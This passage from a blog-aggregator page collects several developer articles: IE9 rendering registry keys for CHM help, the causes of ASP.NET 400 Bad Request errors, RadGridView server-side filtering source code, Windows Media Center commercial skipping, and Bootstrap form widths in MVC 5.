Windows. This component is and has been part of Windows for as long as Internet Explorer has been around, but the Web Browser control hasn't kept up with the latest versions of IE. In a nutshell the control is stuck in IE7 rendering mode for engine compatibility reasons by default. However, there is at least one way to fix this explicitly using Registry keys on a per application basis. The key point from that blog article is that you can override the IE rendering engine for a particular executable by setting one (or more) registry flags that tell the Windows Shell which version of the Internet Explorer rendering engine to load. An application that wishes to use a more recent version of Internet Explorer can then register itself during installation for the specific IE version desired and from then on the application will use that version of the Web Browser component. If the application is older than the specified version it falls back to the default version (IE 7 rendering). Forcing CHM files to display with IE9 (or later) Rendering Knowing that we can force the IE usage for a given process it's also possible to affect the CHM rendering by setting same keys on the executable that's hosting the CHM file. What that executable file is depends on the type of application as there are a number of ways that can launch the help engine. hh.exeThe standalone Windows CHM Help Viewer that launches when you launch a CHM from Windows Explorer. You can manually add hh.exe to the registry keys. YourApplication.exeIf you're using .NET or any tool that internally uses the hhControl ActiveX control to launch help content your application is your host. You should add your application's exe to the registry during application startup. foxhhelp9.exeIf you're building a FoxPro application that uses the built-in help features, foxhhelp9.exe is used to actually host the help controls. Make sure to add this executable to the registry. What to set You can configure the Internet Explorer version used for an application in the registry by specifying the executable file name and a value that specifies the IE version desired. There are two different sets of keys for 32 bit and 64 bit applications. 32 bit only or 64 bit: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION Value Key: hh.exe 32 bit on 64 bit machine: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION Value Key: hh.exe Note that it's best to always set both values ideally when you install your application so it works regardless of which platform you run on. The value specified is a DWORD value and the interesting values are decimal 9000 for IE9 rendering mode depending on !DOCTYPE settings or 9999 for IE 9 standards mode always. You can use the same logic for 8000 and 8888 for IE8 and the final value of 7000 for IE7 (one has to wonder what they're going todo for version 10 to perpetuate that pattern). I think 9000 is the value you'd most likely want to use. 9000 means that IE9 will be used for rendering but unless the right doctypes are used (XHTML and HTML5 specifically) IE will still fall back into quirks mode as needed. This should allow existing pages to continue to use the fallback engine while new pages that have the proper HTML doctype set can take advantage of the newest features. Here's an example of how I set the registry keys in my Tarma Installmate registry configuration: Note that I set all three values both under the Software and Wow6432Node keys so that this works regardless of where these EXEs are launched from. Even though all apps are 32 bit apps, the 64 bit (the default one shown selected) key is often used. So, now once I've set the registry key for hh.exe I can now launch my CHM help file from Explorer and see the following CSS3 IE9 rendered display: Summary It sucks that we have to go through all these hoops to get what should be natural behavior for an application to support the latest features available on a system. But it shouldn't be a surprise - the Windows Help team (if there even is such a thing) has not been known for forward looking technologies. It's a pretty big hassle that we have to resort to setting registry keys in order to get the Web Browser control and the internal CHM engine to render itself properly but at least it's possible to make it work after all. Using this technique it's possible to ship an application with a help file and allow your CHM help to display with richer CSS markup and correct rendering using the stricter and more consistent XHTML or HTML5 doctypes. If you provide both Web help and in-application help (and why not if you're building from a single source) you now can side step the issue of your customers asking: Why does my help file look so much shittier than the online help… No more!© Rick Strahl, West Wind Technologies, 2005-2012Posted in HTML5  Help  Html Help Builder  Internet Explorer  Windows   Tweet !function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs"); (function() { var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true; po.src = 'https://apis.google.com/js/plusone.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s); })();

    Read the article

  • Understanding 400 Bad Request Exception

    - by imran_ku07
        Introduction:          Why I am getting this exception? What is the cause of this error. Developers are always curious to know the root cause of an exception, even though they found the solution from elsewhere. So what is the reason of this exception (400 Bad Request).The answer is security. Security is an important feature for any application. ASP.NET try to his best to give you more secure application environment as possible. One important security feature is related to URLs. Because there are various ways a hacker can try to access server resource. Therefore it is important to make your application as secure as possible. Fortunately, ASP.NET provides this security by throwing an exception of Bad Request whenever he feels. In this Article I am try to present when ASP.NET feels to throw this exception. You will also see some new ASP.NET 4 features which gives developers some control on this situation.   Description:   http.sys Restrictions:           It is interesting to note that after deploying your application on windows server that runs IIS 6 or higher, the first receptionist of HTTP request is the kernel mode HTTP driver: http.sys. Therefore for completing your request successfully you need to present your validity to http.sys and must pass the http.sys restriction.           Every http request URL must not contain any character from ASCII range of 0x00 to 0x1F, because they are not printable. These characters are invalid because these are invalid URL characters as defined in RFC 2396 of the IETF. But a question may arise that how it is possible to send unprintable character. The answer is that when you send your request from your application in binary format.           Another restriction is on the size of the request. A request containg protocal, server name, headers, query string information and individual headers sent along with the request must not exceed 16KB. Also individual header should not exceed 16KB.           Any individual path segment (the portion of the URL that does not include protocol, server name, and query string, for example, http://a/b/c?d=e,  here the b and c are individual path) must not contain more than 260 characters. Also http.sys disallows URLs that have more than 255 path segments.           If any of the above rules are not follow then you will get 400 Bad Request Exception. The reason for this restriction is due to hack attacks against web servers involve encoding the URL with different character representations.           You can change the default behavior enforced by http.sys using some Registry switches present at HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HTTP\Parameters    ASP.NET Restrictions:           After passing the restrictions enforced by the kernel mode http.sys then the request is handed off to IIS and then to ASP.NET engine and then again request has to pass some restriction from ASP.NET in order to complete it successfully.           ASP.NET only allows URL path lengths to 260 characters(only paths, for example http://a/b/c/d, here path is from a to d). This means that if you have long paths containing 261 characters then you will get the Bad Request exception. This is due to NTFS file-path limit.           Another restriction is that which characters can be used in URL path portion.You can use any characters except some characters because they are called invalid characters in path. Here are some of these invalid character in the path portion of a URL, <,>,*,%,&,:,\,?. For confirming this just right click on your Solution Explorer and Add New Folder and name this File to any of the above character, you will get the message. Files or folders cannot be empty strings nor they contain only '.' or have any of the following characters.....            For checking the above situation i have created a Web Application and put Default.aspx inside A%A folder (created from windows explorer), then navigate to, http://localhost:1234/A%25A/Default.aspx, what i get response from server is the Bad Request exception. The reason is that %25 is the % character which is invalid URL path character in ASP.NET. However you can use these characters in query string.           The reason for these restrictions are due to security, for example with the help of % you can double encode the URL path portion and : is used to get some specific resource from server.   New ASP.NET 4 Features:           It is worth to discuss the new ASP.NET 4 features that provides some control in the hand of developer. Previously we are restricted to 260 characters path length and restricted to not use some of characters, means these characters cannot become the part of the URL path segment.           You can configure maxRequestPathLength and maxQueryStringLength to allow longer or shorter paths and query strings. You can also customize set of invalid character using requestPathInvalidChars, under httpruntime element. This may be the good news for someone who needs to use some above character in their application which was invalid in previous versions. You can find further detail about new ASP.NET features about URL at here           Note that the above new ASP.NET settings will not effect http.sys. This means that you have pass the restriction of http.sys before ASP.NET ever come in to the action. Note also that previous restriction of http.sys is applied on individual path and maxRequestPathLength is applied on the complete path (the portion of the URL that does not include protocol, server name, and query string). For example, if URL is http://a/b/c/d?e=f, then maxRequestPathLength will takes, a/b/c/d, into account while http.sys will take a, b, c individually.   Summary:           Hopefully this will helps you to know how some of initial security features comes in to play, but i also recommend that you should read (at least first chapter called Initial Phases of a Web Request of) Professional ASP.NET 2.0 Security, Membership, and Role Management by Stefan Schackow. This is really a nice book.

    Read the article

  • Pure Server-Side Filtering with RadGridView and WCF RIA Services

    Those of you who are familiar with WCF RIA Services know that the DomainDataSource control provides a FilterDescriptors collection that enables you to filter data returned by the query on the server. We have been using this DomainDataSource feature in our RIA Services with DomainDataSource online example for almost an year now. In the example, we are listening for RadGridViews Filtering event in order to intercept any filtering that is performed on the client and translate it to something that the DomainDataSource will understand, in this case a System.Windows.Data.FilterDescriptor being added or removed from its FilterDescriptors collection. Think of RadGridView.FilterDescriptors as client-side filtering and of DomainDataSource.FilterDescriptors as server-side filtering. We no longer need the client-side one. With the introduction of the Custom Filtering Controls feature many new possibilities have opened. With these custom controls we no longer need to do any filtering on the client. I have prepared a very small project that demonstrates how to filter solely on the server by using a custom filtering control. As I have already mentioned filtering on the server is done through the FilterDescriptors collection of the DomainDataSource control. This collection holds instances of type System.Windows.Data.FilterDescriptor. The FilterDescriptor has three important properties: PropertyPath: Specifies the name of the property that we want to filter on (the left operand). Operator: Specifies the type of comparison to use when filtering. An instance of FilterOperator Enumeration. Value: The value to compare with (the right operand). An instance of the Parameter Class. By adding filters, you can specify that only entities which meet the condition in the filter are loaded from the domain context. In case you are not familiar with these concepts you might find Brad Abrams blog interesting. Now, our requirements are to create some kind of UI that will manipulate the DomainDataSource.FilterDescriptors collection. When it comes to collections, my first choice of course would be RadGridView. If you are not familiar with the Custom Filtering Controls concept I would strongly recommend getting acquainted with my step-by-step tutorial Custom Filtering with RadGridView for Silverlight and checking the online example out. I have created a simple custom filtering control that contains a RadGridView and several buttons. This control is aware of the DomainDataSource instance, since it is operating on its FilterDescriptors collection. In fact, the RadGridView that is inside it is bound to this collection. In order to display filters that are relevant for the current column only, I have applied a filter to the grid. This filter is a Telerik.Windows.Data.FilterDescriptor and is used to filter the little grid inside the custom control. It should not be confused with the DomainDataSource.FilterDescriptors collection that RadGridView is actually bound to. These are the RIA filters. Additionally, I have added several other features. For example, if you have specified a DataFormatString on your original column, the Value column inside the custom control will pick it up and format the filter values accordingly. Also, I have transferred the data type of the column that you are filtering to the Value column of the custom control. This will help the little RadGridView determine what kind of editor to show up when you begin edit, for example a date picker for DateTime columns. Finally, I have added four buttons two of them can be used to add or remove filters and the other two will communicate the changes you have made to the server. Here is the full source code of the DomainDataSourceFilteringControl. The XAML: <UserControl x:Class="PureServerSideFiltering.DomainDataSourceFilteringControl"    xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"    xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"     xmlns:telerikGrid="clr-namespace:Telerik.Windows.Controls;assembly=Telerik.Windows.Controls.GridView"     xmlns:telerik="clr-namespace:Telerik.Windows.Controls;assembly=Telerik.Windows.Controls"     Width="300">     <Border x:Name="LayoutRoot"             BorderThickness="1"             BorderBrush="#FF8A929E"             Padding="5"             Background="#FFDFE2E5">           <Grid>             <Grid.RowDefinitions>                 <RowDefinition Height="Auto"/>                 <RowDefinition Height="150"/>                 <RowDefinition Height="Auto"/>             </Grid.RowDefinitions>               <StackPanel Grid.Row="0"                         Margin="2"                         Orientation="Horizontal"                         HorizontalAlignment="Center">                 <telerik:RadButton Name="addFilterButton"                                   Click="OnAddFilterButtonClick"                                   Content="Add Filter"                                   Margin="2"                                   Width="96"/>                 <telerik:RadButton Name="removeFilterButton"                                   Click="OnRemoveFilterButtonClick"                                   Content="Remove Filter"                                   Margin="2"                                   Width="96"/>             </StackPanel>               <telerikGrid:RadGridView Name="filtersGrid"                                     Grid.Row="1"                                     Margin="2"                                     ItemsSource="{Binding FilterDescriptors}"                                     AddingNewDataItem="OnFilterGridAddingNewDataItem"                                     ColumnWidth="*"                                     ShowGroupPanel="False"                                     AutoGenerateColumns="False"                                     CanUserResizeColumns="False"                                     CanUserReorderColumns="False"                                     CanUserFreezeColumns="False"                                     RowIndicatorVisibility="Collapsed"                                     IsFilteringAllowed="False"                                     CanUserSortColumns="False">                 <telerikGrid:RadGridView.Columns>                     <telerikGrid:GridViewComboBoxColumn DataMemberBinding="{Binding Operator}"                                                         UniqueName="Operator"/>                     <telerikGrid:GridViewDataColumn Header="Value"                                                     DataMemberBinding="{Binding Value.Value}"                                                     UniqueName="Value"/>                 </telerikGrid:RadGridView.Columns>             </telerikGrid:RadGridView>               <StackPanel Grid.Row="2"                         Margin="2"                         Orientation="Horizontal"                         HorizontalAlignment="Center">                 <telerik:RadButton Name="filterButton"                                   Click="OnApplyFiltersButtonClick"                                   Content="Apply Filters"                                   Margin="2"                                   Width="96"/>                 <telerik:RadButton Name="clearButton"                                   Click="OnClearFiltersButtonClick"                                   Content="Clear Filters"                                   Margin="2"                                   Width="96"/>             </StackPanel>           </Grid>       </Border> </UserControl>   And the code-behind: using System; using System.Collections.Generic; using System.Linq; using System.Net; using System.Windows; using System.Windows.Controls; using System.Windows.Documents; using System.Windows.Input; using System.Windows.Media; using System.Windows.Media.Animation; using System.Windows.Shapes; using Telerik.Windows.Controls.GridView; using System.Windows.Data; using Telerik.Windows.Controls; using Telerik.Windows.Data;   namespace PureServerSideFiltering {     /// <summary>     /// A custom filtering control capable of filtering purely server-side.     /// </summary>     public partial class DomainDataSourceFilteringControl : UserControl, IFilteringControl     {         // The main player here.         DomainDataSource domainDataSource;           // This is the name of the property that this column displays.         private string dataMemberName;           // This is the type of the property that this column displays.         private Type dataMemberType;           /// <summary>         /// Identifies the <see cref="IsActive"/> dependency property.         /// </summary>         /// <remarks>         /// The state of the filtering funnel (i.e. full or empty) is bound to this property.         /// </remarks>         public static readonly DependencyProperty IsActiveProperty =             DependencyProperty.Register(                 "IsActive",                 typeof(bool),                 typeof(DomainDataSourceFilteringControl),                 new PropertyMetadata(false));           /// <summary>         /// Gets or sets a value indicating whether the filtering is active.         /// </summary>         /// <remarks>         /// Set this to true if you want to lit-up the filtering funnel.         /// </remarks>         public bool IsActive         {             get { return (bool)GetValue(IsActiveProperty); }             set { SetValue(IsActiveProperty, value); }         }           /// <summary>         /// Gets or sets the domain data source.         /// We need this in order to work on its FilterDescriptors collection.         /// </summary>         /// <value>The domain data source.</value>         public DomainDataSource DomainDataSource         {             get { return this.domainDataSource; }             set { this.domainDataSource = value; }         }           public System.Windows.Data.FilterDescriptorCollection FilterDescriptors         {             get { return this.DomainDataSource.FilterDescriptors; }         }           public DomainDataSourceFilteringControl()         {             InitializeComponent();         }           public void Prepare(GridViewBoundColumnBase column)         {             this.LayoutRoot.DataContext = this;               if (this.DomainDataSource == null)             {                 // Sorry, but we need a DomainDataSource. Can't do anything without it.                 return;             }               // This is the name of the property that this column displays.             this.dataMemberName = column.GetDataMemberName();               // This is the type of the property that this column displays.             // We need this in order to see which FilterOperators to feed to the combo-box column.             this.dataMemberType = column.DataType;               // We will use our magic Type extension method to see which operators are applicable for             // this data type. You can go to the extension method body and see what it does.             ((GridViewComboBoxColumn)this.filtersGrid.Columns["Operator"]).ItemsSource                 = this.dataMemberType.ApplicableFilterOperators();               // This is very nice as well. We will tell the Value column its data type. In this way             // RadGridView will pick up the best editor according to the data type. For example,             // if the data type of the value is DateTime, you will be editing it with a DatePicker.             // Nice!             ((GridViewDataColumn)this.filtersGrid.Columns["Value"]).DataType = this.dataMemberType;               // Yet another nice feature. We will transfer the original DataFormatString (if any) to             // the Value column. In this way if you have specified a DataFormatString for the original             // column, you will see all filter values formatted accordingly.             ((GridViewDataColumn)this.filtersGrid.Columns["Value"]).DataFormatString = column.DataFormatString;               // This is important. Since our little filtersGrid will be bound to the entire collection             // of this.domainDataSource.FilterDescriptors, we need to set a Telerik filter on the             // grid so that it will display FilterDescriptor which are relevane to this column ONLY!             Telerik.Windows.Data.FilterDescriptor columnFilter = new Telerik.Windows.Data.FilterDescriptor("PropertyPath"                 , Telerik.Windows.Data.FilterOperator.IsEqualTo                 , this.dataMemberName);             this.filtersGrid.FilterDescriptors.Add(columnFilter);               // We want to listen for this in order to activate and de-activate the UI funnel.             this.filtersGrid.Items.CollectionChanged += this.OnFilterGridItemsCollectionChanged;         }           /// <summary>         // Since the DomainDataSource is a little bit picky about adding uninitialized FilterDescriptors         // to its collection, we will prepare each new instance with some default values and then         // the user can change them later. Go to the event handler to see how we do this.         /// </summary>         void OnFilterGridAddingNewDataItem(object sender, GridViewAddingNewEventArgs e)         {             // We need to initialize the new instance with some values and let the user go on from here.             System.Windows.Data.FilterDescriptor newFilter = new System.Windows.Data.FilterDescriptor();               // This is a must. It should know what member it is filtering on.             newFilter.PropertyPath = this.dataMemberName;               // Initialize it with one of the allowed operators.             // TypeExtensions.ApplicableFilterOperators method for more info.             newFilter.Operator = this.dataMemberType.ApplicableFilterOperators().First();               if (this.dataMemberType == typeof(DateTime))             {                 newFilter.Value.Value = DateTime.Now;             }             else if (this.dataMemberType == typeof(string))             {                 newFilter.Value.Value = "<enter text>";             }             else if (this.dataMemberType.IsValueType)             {                 // We need something non-null for all value types.                 newFilter.Value.Value = Activator.CreateInstance(this.dataMemberType);             }               // Let the user edit the new filter any way he/she likes.             e.NewObject = newFilter;         }           void OnFilterGridItemsCollectionChanged(object sender, System.Collections.Specialized.NotifyCollectionChangedEventArgs e)         {             // We are active only if we have any filters define. In this case the filtering funnel will lit-up.             this.IsActive = this.filtersGrid.Items.Count > 0;         }           private void OnApplyFiltersButtonClick(object sender, RoutedEventArgs e)         {             if (this.DomainDataSource.IsLoadingData)             {                 return;             }               // Comment this if you want the popup to stay open after the button is clicked.             this.ClosePopup();               // Since this.domainDataSource.AutoLoad is false, this will take into             // account all filtering changes that the user has made since the last             // Load() and pull the new data to the client.             this.DomainDataSource.Load();         }           private void OnClearFiltersButtonClick(object sender, RoutedEventArgs e)         {             if (this.DomainDataSource.IsLoadingData)             {                 return;             }               // We want to remove ONLY those filters from the DomainDataSource             // that this control is responsible for.             this.DomainDataSource.FilterDescriptors                 .Where(fd => fd.PropertyPath == this.dataMemberName) // Only "our" filters.                 .ToList()                 .ForEach(fd => this.DomainDataSource.FilterDescriptors.Remove(fd)); // Bye-bye!               // Comment this if you want the popup to stay open after the button is clicked.             this.ClosePopup();               // After we did our housekeeping, get the new data to the client.             this.DomainDataSource.Load();         }           private void OnAddFilterButtonClick(object sender, RoutedEventArgs e)         {             if (this.DomainDataSource.IsLoadingData)             {                 return;             }               // Let the user enter his/or her requirements for a new filter.             this.filtersGrid.BeginInsert();             this.filtersGrid.UpdateLayout();         }           private void OnRemoveFilterButtonClick(object sender, RoutedEventArgs e)         {             if (this.DomainDataSource.IsLoadingData)             {                 return;             }               // Find the currently selected filter and destroy it.             System.Windows.Data.FilterDescriptor filterToRemove = this.filtersGrid.SelectedItem as System.Windows.Data.FilterDescriptor;             if (filterToRemove != null                 && this.DomainDataSource.FilterDescriptors.Contains(filterToRemove))             {                 this.DomainDataSource.FilterDescriptors.Remove(filterToRemove);             }         }           private void ClosePopup()         {             System.Windows.Controls.Primitives.Popup popup = this.ParentOfType<System.Windows.Controls.Primitives.Popup>();             if (popup != null)             {                 popup.IsOpen = false;             }         }     } }   Finally, we need to tell RadGridViews Columns to use this custom control instead of the default one. Here is how to do it: using System; using System.Collections.Generic; using System.Linq; using System.Net; using System.Windows; using System.Windows.Controls; using System.Windows.Documents; using System.Windows.Input; using System.Windows.Media; using System.Windows.Media.Animation; using System.Windows.Shapes; using System.Windows.Data; using Telerik.Windows.Data; using Telerik.Windows.Controls; using Telerik.Windows.Controls.GridView;   namespace PureServerSideFiltering {     public partial class MainPage : UserControl     {         public MainPage()         {             InitializeComponent();             this.grid.AutoGeneratingColumn += this.OnGridAutoGeneratingColumn;               // Uncomment this if you want the DomainDataSource to start pre-filtered.             // You will notice how our custom filtering controls will correctly read this information,             // populate their UI with the respective filters and lit-up the funnel to indicate that             // filtering is active. Go ahead and try it.             this.employeesDataSource.FilterDescriptors.Add(new System.Windows.Data.FilterDescriptor("Title", System.Windows.Data.FilterOperator.Contains, "Assistant"));             this.employeesDataSource.FilterDescriptors.Add(new System.Windows.Data.FilterDescriptor("HireDate", System.Windows.Data.FilterOperator.IsGreaterThan, new DateTime(1998, 12, 31)));             this.employeesDataSource.FilterDescriptors.Add(new System.Windows.Data.FilterDescriptor("HireDate", System.Windows.Data.FilterOperator.IsLessThanOrEqualTo, new DateTime(1999, 12, 31)));               this.employeesDataSource.Load();         }           /// <summary>         /// First of all, we will need to replace the default filtering control         /// of each column with out custom filtering control DomainDataSourceFilteringControl         /// </summary>         private void OnGridAutoGeneratingColumn(object sender, GridViewAutoGeneratingColumnEventArgs e)         {             GridViewBoundColumnBase dataColumn = e.Column as GridViewBoundColumnBase;             if (dataColumn != null)             {                 // We do not like ugly dates.                 if (dataColumn.DataType == typeof(DateTime))                 {                     dataColumn.DataFormatString = "{0:d}"; // Short date pattern.                       // Notice how this format will be later transferred to the Value column                     // of the grid that we have inside the DomainDataSourceFilteringControl.                 }                   // Replace the default filtering control with our.                 dataColumn.FilteringControl = new DomainDataSourceFilteringControl()                 {                     // Let the control know about the DDS, after all it will work directly on it.                     DomainDataSource = this.employeesDataSource                 };                   // Finally, lit-up the filtering funnel through the IsActive dependency property                 // in case there are some filters on the DDS that match our column member.                 string dataMemberName = dataColumn.GetDataMemberName();                 dataColumn.FilteringControl.IsActive =                     this.employeesDataSource.FilterDescriptors                     .Where(fd => fd.PropertyPath == dataMemberName)                     .Count() > 0;             }         }     } } The best part is that we are not only writing filters for the DomainDataSource we can read and load them. If the DomainDataSource has some pre-existing filters (like I have created in the code above), our control will read them and will populate its UI accordingly. Even the filtering funnel will light-up! Remember, the funnel is controlled by the IsActive property of our control. While this is just a basic implementation, the source code is absolutely yours and you can take it from here and extend it to match your specific business requirements. Below the main grid there is another debug grid. With its help you can monitor what filter descriptors are added and removed to the domain data source. Download Source Code. (You will have to have the AdventureWorks sample database installed on the default SQLExpress instance in order to run it.) Enjoy!Did you know that DotNetSlackers also publishes .net articles written by top known .net Authors? We already have over 80 articles in several categories including Silverlight. Take a look: here.

    Read the article

  • How To Skip Commercials in Windows 7 Media Center

    - by DigitalGeekery
    If you use Windows 7 Media Center to record live TV, you’re probably interested in skipping through commercials. After all, a big reason to record programs is to avoid commercials, right? Today we focus on a fairly simple and free way to get you skipping commercials in no time. In Windows 7, the .wtv file format has replaced the dvr-ms file format used in previous versions of Media Center for Recorded TV. The .wtv file format, however, does not work very well with commercial skipping applications.  The Process Our first step will be to convert the recorded .wtv files to the previously used dvr-ms file format. This conversion will be done automatically by WtvWatcher. It’s important to note that this process deletes the original .wtv file after successfully converting to .dvr-ms. Next, we will use DVRMSToolBox with the DTB Addin to handle commercials skipping. This process does not “cut” or remove the commercials from the file. It merely skips the commercials during playback. WtvWatcher Download and install the WTVWatcher (link below). To install WtvWatcher, you’ll need to have Windows Installer 3.1 and .NET Framework 3.5 SP1. If you get the Publisher cannot be verified warning you can go ahead and click Install. We’ve completely tested this app and it contains no malware and runs successfully.   After installing, the WtvWatcher will pop up in the lower right corner of your screen. You will need to set the path to your Recorded TV directory. Click on the button for “Click here to set your recorded TV path…”   The WtvWatcher Preferences window will open…   …and you’ll be prompted to browse for your Recorded TV folder. If you did not change the default location at setup, it will be found at C:\Users\Public\Recorded TV. Click “OK” when finished. Click the “X” to close the Preferences screen. You should now see WtvWatcher begin to convert any existing WTV files.   The process should only take a few minutes per file. Note: If WtvWatcher detects an error during the conversion process, it will not delete the original WTV file.    You will probably want to run WtvWatcher on startup. This will allow WtvWatcher too constantly scan for new .wtv files to convert. There is no setting in the application to run on startup, so you’ll need to copy the WTV icon from your desktop into your Windows start menu “Startup” directory. To do so, click on Start > All Programs, right-click on Startup and click on Open all users. Drag and drop, or cut and paste, the WtvWatcher desktop shortcut into the Startup folder. DVRMSToolBox and DTBAddIn Next, we need to download and install the DVRMSToolBox and the DTBAddIn. These two pieces of software will do the actual commercial skipping. After downloading the DVRMSToolBox zip file, extract it and double-click the setup.exe file.  Click “Next” to begin the installation.   Unless DVRMSToolBox will only be used by Administrator accounts, check the “Modify File Permissions” box. Click “Next.” When you get to the Optional Components window, uncheck Download/Install ShowAnalyzer. We will not be using that application. When the installation is complete, click “Close.”    Next we need to install the DTBAddin. Unzip the download folder and run the appropriate .msi file for your system. It is available in 32 & 64 bit versions. Just double click on the file and take the default options. Click “Finish” when the install is completed. You will then be prompted to restart your computer. After your computer has restarted, open DVRMSToolBox settings by going to Start > All Programs, DVRMSToolBox, and click on DVRMStoMPEGSettings. On the MC Addin tab, make sure that Skip Commercials is checked. It should be by default.   On the Commercial Skip tab, make sure the Auto Skip option is selected. Click “Save.”   If you try to watch recorded TV before the file conversion and commercial indexing process is complete you’ll get the following message pop up in Media Center. If you click Yes, it will start indexing the commercials if WtvWatcher has already converted it to dvr-ms. Now you’re ready to kick back and watch your recorded tv without having to wait through those long commercial breaks. Conclusion The DVRMSToolBox is a powerful and complex application with a multitude of features and utilities. We’ve showed you a quick and easy way to get your Windows Media Center setup to skip commercials. This setup, like virtually all commercial skipping setups, is not perfect. You will occasionally find a commercial that doesn’t get skipped. Need help getting your Windows 7 PC configured for TV? Check out our previous tutorial on setting up live TV in Windows Media Center. Links Download WTV Watcher Download DVRMSToolBox Download DTBAddin Similar Articles Productive Geek Tips Using Netflix Watchnow in Windows Vista Media Center (Gmedia)Increase Skip and Replay Intervals in Windows 7 Media CenterSchedule Updates for Windows Media CenterIntegrate Hulu Desktop and Windows Media Center in Windows 7Add Color Coding to Windows 7 Media Center Program Guide TouchFreeze Alternative in AutoHotkey The Icy Undertow Desktop Windows Home Server – Backup to LAN The Clear & Clean Desktop Use This Bookmarklet to Easily Get Albums Use AutoHotkey to Assign a Hotkey to a Specific Window Latest Software Reviews Tinyhacker Random Tips Revo Uninstaller Pro Registry Mechanic 9 for Windows PC Tools Internet Security Suite 2010 PCmover Professional Make your Joomla & Drupal Sites Mobile with OSMOBI Integrate Twitter and Delicious and Make Life Easier Design Your Web Pages Using the Golden Ratio Worldwide Growth of the Internet How to Find Your Mac Address Use My TextTools to Edit and Organize Text

    Read the article

  • Visual Studio 2013, ASP.NET MVC 5 Scaffolded Controls, and Bootstrap

    - by plitwin
    A few days ago, I created an ASP.NET MVC 5 project in the brand new Visual Studio 2013. I added some model classes and then proceeded to scaffold a controller class and views using the Entity Framework. Scaffolding Some Views Visual Studio 2013, by default, uses the Bootstrap 3 responsive CSS framework. Great; after all, we all want our web sites to be responsive and work well on mobile devices. Here’s an example of a scaffolded Create view as shown in Google Chrome browser   Looks pretty good. Okay, so let’s increase the width of the Title, Description, Address, and Date/Time textboxes. And decrease the width of the  State and MaxActors textbox controls. Can’t be that hard… Digging Into the Code Let’s take a look at the scaffolded Create.cshtml file. Here’s a snippet of code behind the Create view. Pretty simple stuff. @using (Html.BeginForm()) { @Html.AntiForgeryToken() <div class="form-horizontal"> <h4>RandomAct</h4> <hr /> @Html.ValidationSummary(true) <div class="form-group"> @Html.LabelFor(model => model.Title, new { @class = "control-label col-md-2" }) <div class="col-md-10"> @Html.EditorFor(model => model.Title) @Html.ValidationMessageFor(model => model.Title) </div> </div> <div class="form-group"> @Html.LabelFor(model => model.Description, new { @class = "control-label col-md-2" }) <div class="col-md-10"> @Html.EditorFor(model => model.Description) @Html.ValidationMessageFor(model => model.Description) </div> </div> .csharpcode, .csharpcode pre { font-size: small; color: black; font-family: consolas, "Courier New", courier, monospace; background-color: #ffffff; /*white-space: pre;*/ } .csharpcode pre { margin: 0em; } .csharpcode .rem { color: #008000; } .csharpcode .kwrd { color: #0000ff; } .csharpcode .str { color: #006080; } .csharpcode .op { color: #0000c0; } .csharpcode .preproc { color: #cc6633; } .csharpcode .asp { background-color: #ffff00; } .csharpcode .html { color: #800000; } .csharpcode .attr { color: #ff0000; } .csharpcode .alt { background-color: #f4f4f4; width: 100%; margin: 0em; } .csharpcode .lnum { color: #606060; } A little more digging and I discover that there are three CSS files of importance in how the page is rendered: boostrap.css (and its minimized cohort) and site.css as shown below.   The Root of the Problem And here’s the root of the problem which you’ll find the following CSS in Site.css: /* Set width on the form input elements since they're 100% wide by default */ input, select, textarea { max-width: 280px; } .csharpcode, .csharpcode pre { font-size: small; color: black; font-family: consolas, "Courier New", courier, monospace; background-color: #ffffff; /*white-space: pre;*/ } .csharpcode pre { margin: 0em; } .csharpcode .rem { color: #008000; } .csharpcode .kwrd { color: #0000ff; } .csharpcode .str { color: #006080; } .csharpcode .op { color: #0000c0; } .csharpcode .preproc { color: #cc6633; } .csharpcode .asp { background-color: #ffff00; } .csharpcode .html { color: #800000; } .csharpcode .attr { color: #ff0000; } .csharpcode .alt { background-color: #f4f4f4; width: 100%; margin: 0em; } .csharpcode .lnum { color: #606060; } Yes, Microsoft is for some reason setting the maximum width of all input, select, and textarea controls to 280 pixels. Not sure the motivation behind this, but until you change this or overrride this by assigning the form controls to some other CSS class, your controls will never be able to be wider than 280px. The Fix Okay, so here’s the deal: I hope to become very competent in all things Bootstrap in the near future, but I don’t think you should have to become a Bootstrap guru in order to modify some scaffolded control widths. And you don’t. Here is the solution I came up with: Find the aforementioned CSS code in SIte.css and change it to something more tenable. Such as: /* Set width on the form input elements since they're 100% wide by default */ input, select, textarea { max-width: 600px; } Because the @Html.EditorFor html helper doesn’t support the passing of HTML attributes, you will need to repalce any @Html.EditorFor() helpers with @Html.TextboxFor(), @Html.TextAreaFor, @Html.CheckBoxFor, etc. helpers, and then add a custom width attribute to each control you wish to modify. Thus, the earlier stretch of code might end up looking like this: @using (Html.BeginForm()) { @Html.AntiForgeryToken() <div class="form-horizontal"> <h4>Random Act</h4> <hr /> @Html.ValidationSummary(true) <div class="form-group"> @Html.LabelFor(model => model.Title, new { @class = "control-label col-md-2" }) <div class="col-md-10"> @Html.TextBoxFor(model => model.Title, new { style = "width: 400px" }) @Html.ValidationMessageFor(model => model.Title) </div> </div> <div class="form-group"> @Html.LabelFor(model => model.Description, new { @class = "control-label col-md-2" }) <div class="col-md-10"> @Html.TextAreaFor(model => model.Description, new { style = "width: 400px" }) @Html.ValidationMessageFor(model => model.Description) </div> </div> .csharpcode, .csharpcode pre { font-size: small; color: black; font-family: consolas, "Courier New", courier, monospace; background-color: #ffffff; /*white-space: pre;*/ } .csharpcode pre { margin: 0em; } .csharpcode .rem { color: #008000; } .csharpcode .kwrd { color: #0000ff; } .csharpcode .str { color: #006080; } .csharpcode .op { color: #0000c0; } .csharpcode .preproc { color: #cc6633; } .csharpcode .asp { background-color: #ffff00; } .csharpcode .html { color: #800000; } .csharpcode .attr { color: #ff0000; } .csharpcode .alt { background-color: #f4f4f4; width: 100%; margin: 0em; } .csharpcode .lnum { color: #606060; } Resulting Form Here’s what 